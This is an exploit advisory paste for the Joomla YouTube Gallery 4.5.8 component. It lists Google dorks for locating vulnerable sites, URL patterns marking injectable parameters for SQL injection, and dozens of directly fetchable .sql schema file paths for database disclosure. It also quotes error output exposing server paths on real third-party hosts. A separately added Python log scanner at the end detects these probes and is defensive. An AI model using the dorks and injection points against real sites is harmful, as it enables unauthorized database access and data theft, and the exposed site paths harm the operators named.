KingSkrupellos

Joomla YoutubeGallery 4.5.8 Database Disclosure and SQL Inj

Jan 17th, 2019
########################################################################################

# Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : joomlaboat.com
# Software Information Links : extensions.joomla.org/extension/youtube-gallery/
joomlaboat.com/en/youtube-gallery
# Software Download Link : joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip
# Software Vulnerable Source Codes :
github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql
github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql
# Software Affected Versions : 4.5.8 and previous versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_youtubegallery''
inurl:''/administrator/components/com_youtubegallery/''
# Previous Version : 4.1.7 CVE Details =>
nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/
# CVE : CVE-2014-4960
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

########################################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=[ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]

/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=[ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&listid=[ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=true&height=[ID-NUMBER]&width=[SQL Injection]

########################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
/administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql

########################################################################################

# Example Vulnerable Sites :
*************************

########################################################################################

# Example SQL Database Error :

Strict Standards: Only variables should be assigned by reference in /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on line 51

Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID() should not be called statically, assuming $this from incompatible context in /home/medealab/public_html/senscience/components/com_youtubegallery/includes/misc.php on line 198

Warning: DOMDocument::load(http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo) [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410 Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components/com_youtubegallery/models/gallery.php on line 145

########################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

########################################################################################
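
A log check for the two issues listed above, as an added example that is not part of the original paste: it flags requests for the component's .sql files and requests to the listed components whose parameter values do not fit an expected shape. The value shapes, finding labels, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line and status from a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[0-9.]+" (\d{3})')
# Install/update scripts under the component's sql/ directory (paths from the paste).
SQL_FILE = re.compile(r"/administrator/components/com_youtubegallery/sql/.*\.sql$", re.I)
COMPONENTS = {"com_youtubegallery", "com_easy_youtube_gallery"}
# Assumed value shapes for the parameters the paste lists (not taken from the component).
NUMERIC = ("Itemid", "galleryid", "listid", "themeid", "mycategory",
           "defaultvideo", "height", "width")
SHAPES = {name: re.compile(r"\d+") for name in NUMERIC}
SHAPES["videoid"] = re.compile(r"[A-Za-z0-9_-]{1,32}")
SHAPES["lang"] = re.compile(r"[A-Za-z]{2,3}(-[A-Za-z]{2})?")
SHAPES["tmpl"] = re.compile(r"[A-Za-z0-9_]+")

def classify(line):
    """Return a list of (finding, detail) tuples for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url, status = urlsplit(m.group(1)), m.group(2)
    findings = []
    if SQL_FILE.search(url.path):
        # A 200 means the web server handed the schema file to the client.
        findings.append(("sql-file-served" if status == "200" else "sql-file-probe", url.path))
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decodes values
    if any(k == "option" and v in COMPONENTS for k, v in params):
        for k, v in params:
            if k in SHAPES and not SHAPES[k].fullmatch(v):
                findings.append(("bad-param", f"{k}={v}"))
    return findings

# Constructed sample lines (documentation IP ranges, made-up IDs).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=37%27 HTTP/1.1" 500 1204',
    '203.0.113.7 - - [18/Jan/2019:10:00:05 +0000] "GET /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql HTTP/1.1" 200 5120',
    '198.51.100.4 - - [18/Jan/2019:10:01:00 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=37&videoid=abc_DEF-123 HTTP/1.1" 200 9000',
    '203.0.113.7 - - [18/Jan/2019:10:02:00 +0000] "GET /site/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql HTTP/1.1" 403 199',
]

def scan(lines):
    """Map 1-based line number -> findings, skipping clean lines."""
    hits = {n: classify(line) for n, line in enumerate(lines, 1)}
    return {n: f for n, f in hits.items() if f}

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

A `sql-file-served` finding means the server returned the schema file, so the component's `sql/` directory should be denied at the web server.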